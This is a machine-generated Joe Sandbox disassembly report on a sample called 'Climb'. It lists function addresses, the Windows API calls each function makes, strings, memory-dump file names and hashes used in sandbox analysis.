Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 9ccee425b2620197d269c92f1ff986fa865cf8207c15b5c30f2a303a50e7fb2e
Instruction ID: 784c1f9ad11cdfc40f0dc8e776d0fa611bd2dfa4dfb8f707529fd5d36e549f76
Opcode Fuzzy Hash: 9ccee425b2620197d269c92f1ff986fa865cf8207c15b5c30f2a303a50e7fb2e
Instruction Fuzzy Hash: A221A875500309DFDB304F658C04AAA77F8BF55724F20461AF9B1E32E1DB759940DB64

Function 00514B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00487873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004878B1
Part of subcall function 00487873: GetStockObject.GDI32(00000011), ref: 004878C5
Part of subcall function 00487873: SendMessageW.USER32(00000000,00000030,00000000), ref: 004878CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00514BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00514BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00514BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00514BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00514BE3

Strings

Msctls_Progress32, xrefs: 00514B81

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 8833c994f72501fb20fc056ed3345641251e30a915d59eb38c485cd5dd521cc8
Instruction ID: 5a4741e1bbf36a5cc657dd40c0e475cd5e96844e343d0e07643269fef6d65fa1
Opcode Fuzzy Hash: 8833c994f72501fb20fc056ed3345641251e30a915d59eb38c485cd5dd521cc8
Instruction Fuzzy Hash: BE1193B1140219BEEF119FA5CC85EEB7F6DFF08798F014111B608A2090CB75DC61DBA4

Function 004BDB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004BDB23: _free.LIBCMT ref: 004BDB4C

_free.LIBCMT ref: 004BDBAD

Part of subcall function 004B2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,004BDB51,00551DC4,00000000,00551DC4,00000000,?,004BDB78,00551DC4,00000007,00551DC4,?,004BDF75,00551DC4), ref: 004B2D4E
Part of subcall function 004B2D38: GetLastError.KERNEL32(00551DC4,?,004BDB51,00551DC4,00000000,00551DC4,00000000,?,004BDB78,00551DC4,00000007,00551DC4,?,004BDF75,00551DC4,00551DC4), ref: 004B2D60

_free.LIBCMT ref: 004BDBB8
_free.LIBCMT ref: 004BDBC3
_free.LIBCMT ref: 004BDC17
_free.LIBCMT ref: 004BDC22
_free.LIBCMT ref: 004BDC2D
_free.LIBCMT ref: 004BDC38

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: 22152026fd6529b989d4b0aa1eaeb21840d3dd8c28110c58469750d836587c28
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: D4115473945B04B6D920BF72CC07FCBBBDC9F04704F410C5EB299AA152E67DB5048664

Function 004E6078 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 004E608D
_memcmp.LIBVCRUNTIME ref: 004E60AB
_memcmp.LIBVCRUNTIME ref: 004E60BE
_memcmp.LIBVCRUNTIME ref: 004E60D6
_memcmp.LIBVCRUNTIME ref: 004E60EE

Strings

j`N, xrefs: 004E609B

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _memcmp
String ID: j`N
API String ID: 2931989736-1318621396
Opcode ID: 29041489834b58fa9eddc970f4fd14db2fa3fe9365a3bcf5bc3ec635b238a8a6
Instruction ID: cf9fce03ad13ff0b792a934475ded6db9ad85d108fee81f7eb6f746d4231a30f
Opcode Fuzzy Hash: 29041489834b58fa9eddc970f4fd14db2fa3fe9365a3bcf5bc3ec635b238a8a6
Instruction Fuzzy Hash: E501F9F16013757BA61096135C42F6B735DAF723DDF025027FE059A282E739ED10C2A9

Function 004EE30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004EE328
LoadStringW.USER32(00000000), ref: 004EE32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004EE345
LoadStringW.USER32(00000000), ref: 004EE34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 004EE390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 004EE36D

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: e5804d5117ac1336d020070b26adaa70ec66fb68841ee16074d675455d59fd2c
Instruction ID: a767fbaf52c5241b3d1987f8cd4ad69da46d52a4d882f834fe0798dae89c34d9
Opcode Fuzzy Hash: e5804d5117ac1336d020070b26adaa70ec66fb68841ee16074d675455d59fd2c
Instruction Fuzzy Hash: 6A0186F69003087FE71197A59D89EE7777CDB08305F008592BB05E6041E6789E889B75

Function 004F1312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 004F1322
EnterCriticalSection.KERNEL32(00000000,?), ref: 004F1334
TerminateThread.KERNEL32(00000000,000001F6), ref: 004F1342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 004F1350
CloseHandle.KERNEL32(00000000), ref: 004F135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 004F136F
LeaveCriticalSection.KERNEL32(00000000), ref: 004F1376

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 7267892c497c07e721064a64b9651ed97e574528f3cfbe28e8c3c286a1c5bfdf
Instruction ID: 5fe45d3655c6991b0e16b4c9b4e39b72ec72f028221fd0f356d0941de252784f
Opcode Fuzzy Hash: 7267892c497c07e721064a64b9651ed97e574528f3cfbe28e8c3c286a1c5bfdf
Instruction Fuzzy Hash: E7F03C32042612FBD3411B54EE49BD6BB39FF14302F405121F611928B0C7799578EFA0

Function 005026BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0050281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0050283E
WSAGetLastError.WSOCK32 ref: 0050284F
htons.WSOCK32(?,?,?,?,?), ref: 00502938
inet_ntoa.WSOCK32(?), ref: 005028E9

Part of subcall function 004E433E: _strlen.LIBCMT ref: 004E4348

Part of subcall function 00503C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,004FF669), ref: 00503C9D

_strlen.LIBCMT ref: 00502992

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 0d2454cd7b992408ecab4ed93f1d4a48082825f4c060847db5bf4dac3fb7ddf9
Instruction ID: 83fccdaea14429f06ef362deebd0e4304d0b74f9631db4f65d8122afa1c34e15
Opcode Fuzzy Hash: 0d2454cd7b992408ecab4ed93f1d4a48082825f4c060847db5bf4dac3fb7ddf9
Instruction Fuzzy Hash: 01B1BD31604300AFD324EF25C889E2EBBA5BF84318F54894DF45A4B2E2DB75ED85CB91

Function 004B0527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 004B042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004B0446
__allrem.LIBCMT ref: 004B045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004B047B
__allrem.LIBCMT ref: 004B0492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004B04B0

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction ID: 77a6cec5ef40fd1521c712d00140c9ba0e0fc3ef2a806610f3b481236358539c
Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction Fuzzy Hash: CC811871600705ABD7249E69CC81BEB73E8AF44325F14452FF511D7281EBB8DD0087B8

Function 004B6571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,004A8649,004A8649,?,?,?,004B67C2,00000001,00000001,8BE85006), ref: 004B65CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004B67C2,00000001,00000001,8BE85006,?,?,?), ref: 004B6651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004B674B
__freea.LIBCMT ref: 004B6758

Part of subcall function 004B3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,004A6A79,?,0000015D,?,?,?,?,004A85B0,000000FF,00000000,?,?), ref: 004B3BC5

__freea.LIBCMT ref: 004B6761
__freea.LIBCMT ref: 004B6786

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: ea6fd6d1192345c126f5854384bd474e88959e0abc8a20d5a6abd2e893073d60
Instruction ID: 27768c21d85eee1dc799cd386a5884db2bdc72bc558db0202e51ae9ec79634e9
Opcode Fuzzy Hash: ea6fd6d1192345c126f5854384bd474e88959e0abc8a20d5a6abd2e893073d60
Instruction Fuzzy Hash: 2351F272600206ABDB248F65CC81EEB77AAEB40718F16426EFC04D6250EF3CDC5186B8

Function 0050C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

Part of subcall function 0050D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0050C10E,?,?), ref: 0050D415
Part of subcall function 0050D3F8: _wcslen.LIBCMT ref: 0050D451
Part of subcall function 0050D3F8: _wcslen.LIBCMT ref: 0050D4C8
Part of subcall function 0050D3F8: _wcslen.LIBCMT ref: 0050D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0050C72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0050C785
RegCloseKey.ADVAPI32(00000000), ref: 0050C7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0050C7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0050C853
RegCloseKey.ADVAPI32(?), ref: 0050C85F

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 1ef9d7876e16ac9f986809644fa714e057fd8947a65bc477ee262dd2afc3fee8
Instruction ID: d488442313022eeb41adc7dd316846f3d94ff0c6617aea1209fcdf436f4a3593
Opcode Fuzzy Hash: 1ef9d7876e16ac9f986809644fa714e057fd8947a65bc477ee262dd2afc3fee8
Instruction Fuzzy Hash: 94818971208241AFC714EF24C885E6EBBE5FF85308F14899DF4598B2A2DB31ED45CB92

Function 004E009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 004E00A9
SysAllocString.OLEAUT32(00000000), ref: 004E0150
VariantCopy.OLEAUT32(004E0354,00000000), ref: 004E0179
VariantClear.OLEAUT32(004E0354), ref: 004E019D
VariantCopy.OLEAUT32(004E0354,00000000), ref: 004E01A1
VariantClear.OLEAUT32(?), ref: 004E01AB

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 73fd906b08379a32bf8d3d55895929e2c166422c06b9e62c6b2317d9640e2112
Instruction ID: 02b0dd3cf9eddcd5910a34a09d7bd50bcd5a6aaeb94e0537a2173ea6f5b58c8b
Opcode Fuzzy Hash: 73fd906b08379a32bf8d3d55895929e2c166422c06b9e62c6b2317d9640e2112
Instruction Fuzzy Hash: 79512B31500350AACF20AF67A885729B3E4EF15316F14848BE915DF296DBF88C81C76E

Function 004F9B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 004841EA: _wcslen.LIBCMT ref: 004841EF

Part of subcall function 00488577: _wcslen.LIBCMT ref: 0048858A

GetOpenFileNameW.COMDLG32(00000058), ref: 004F9F2A
_wcslen.LIBCMT ref: 004F9F4B
_wcslen.LIBCMT ref: 004F9F72
GetSaveFileNameW.COMDLG32(00000058), ref: 004F9FCA

Strings

X, xrefs: 004F9E57

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 6c1cd8370f32703fae0f36e14e11c83621eb0a3abeeb6621eb5084e174cbe4ab
Instruction ID: 35a1985a551bce02b08f4b5500d7101a53283ce14665b99229248c5425fa869f
Opcode Fuzzy Hash: 6c1cd8370f32703fae0f36e14e11c83621eb0a3abeeb6621eb5084e174cbe4ab
Instruction Fuzzy Hash: E3E17F315043409FC724EF25C881B6EB7E5BF85318F14896EF9898B2A2DB39DD05CB96

Function 004F6ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004F6F21
CoInitialize.OLE32(00000000), ref: 004F707E
CoCreateInstance.OLE32(00520CC4,00000000,00000001,00520B34,?), ref: 004F7095
CoUninitialize.OLE32 ref: 004F7319

Strings

.lnk, xrefs: 004F6EFF, 004F6F69, 004F7025

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 2290b14bc3e9008e6a4617f8f8eb32d6c3f69463ad2785020b740ed38d525362
Instruction ID: 47e656f5d5b309ee158dd32f243899fca72b3f409db7c1f906ca80c72651d7e6
Opcode Fuzzy Hash: 2290b14bc3e9008e6a4617f8f8eb32d6c3f69463ad2785020b740ed38d525362
Instruction Fuzzy Hash: A4D17671508205AFC300EF25C881A6FB7E8FF98308F40496EF5858B2A2DB75ED45CB96

Function 004F1196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 004F11B3
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 004F11EE
EnterCriticalSection.KERNEL32(?), ref: 004F120A
LeaveCriticalSection.KERNEL32(?), ref: 004F1283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 004F129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 004F12C8

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 0c69d0fcbf2d6f845a972ec458e787176f022da0adce53568d05cdd1b7be351a
Instruction ID: 7600ba9da73caa3949029138294414d1cf5a888d601d6da2ebc043b17e858d93
Opcode Fuzzy Hash: 0c69d0fcbf2d6f845a972ec458e787176f022da0adce53568d05cdd1b7be351a
Instruction Fuzzy Hash: A841A075900204EFDF049F94DCC5AAA77B8FF15304F1080AAEE00AB2A6D734DE54DBA8

Function 00518C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,004DFBEF,00000000,?,?,00000000,?,004C39E2,00000004,00000000,00000000), ref: 00518CA7
EnableWindow.USER32(?,00000000), ref: 00518CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00518D2C
ShowWindow.USER32(?,00000004), ref: 00518D40
EnableWindow.USER32(?,00000001), ref: 00518D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00518D8A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: e32427e78392d7333237ecfb07a7463cd6cf2cee63df82632dcfa21a5ebe6f18
Instruction ID: 06bb5dcc8c5a7cad09bae0dce2b021f3d839eba860d6b946e89d0c59f89497fe
Opcode Fuzzy Hash: e32427e78392d7333237ecfb07a7463cd6cf2cee63df82632dcfa21a5ebe6f18
Instruction Fuzzy Hash: C6416074601244AFEB35DF24D899BF57FB1FB56309F1441A9E5084F2A2CB316C89DBA0

Function 00502D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00502D45

Part of subcall function 004FEF33: GetWindowRect.USER32(?,?), ref: 004FEF4B

GetDesktopWindow.USER32 ref: 00502D6F
GetWindowRect.USER32(00000000), ref: 00502D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00502DB2
GetCursorPos.USER32(?), ref: 00502DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00502E3C

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: af4e0e7aeb5471bcb9692443a1a8effa6a1937d17b9a8de3477db30d2e55586c
Instruction ID: 9bef3660984d2e2fb274b8290405fa6c4be8d60de0d2d3d7dfb296c56bd4e8c0
Opcode Fuzzy Hash: af4e0e7aeb5471bcb9692443a1a8effa6a1937d17b9a8de3477db30d2e55586c
Instruction Fuzzy Hash: B331DE72505316AFC720DF14D849F9FBBA9FB84314F00091AF98997181DB34ED09CBA2

Function 004E55E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004E55F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004E5616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004E564E
_wcslen.LIBCMT ref: 004E566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004E5674
